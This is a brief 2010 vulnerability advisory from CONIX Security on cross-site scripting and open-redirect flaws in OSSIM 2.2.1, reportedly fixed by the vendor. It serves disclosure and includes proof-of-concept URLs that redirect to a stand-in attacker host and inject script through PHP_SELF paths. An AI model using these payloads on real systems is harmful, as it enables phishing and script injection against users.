OSSIM 2.2.1 Cross Site Scripting

`================== Summary ==================  
  
Multiple XSS vulnerabilities in OSSIM 2.2.1  
  
Discovered by: CONIX Security (www.conix.fr)  
Public Release Date: 3/31/2010  
Vendor: Alienvault (www.alienvault.com)  
Fixed: Yes (3/30/2010)  
  
============= Technical Details =============  
  
1. An attacker can redirect a victim to a malicious website by giving him a malicious URL, by social engineering or by phishing:  
  
Example:  
  
- http://ossim-server/ossim/nagios/index.php?sensor=www.attacker.com  
  
The top links will then point to http://www.attacker.com  
  
2. All the pages that contains the variable $_SERVER['PHP_SELF'] are vulnerable to an XSS:  
  
Examples:  
  
- http://ossim-server/ossim/control_panel/alarm_console.php/"><script>alert('xss')</script>  
- http://ossim-server/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');//  
- ...  
`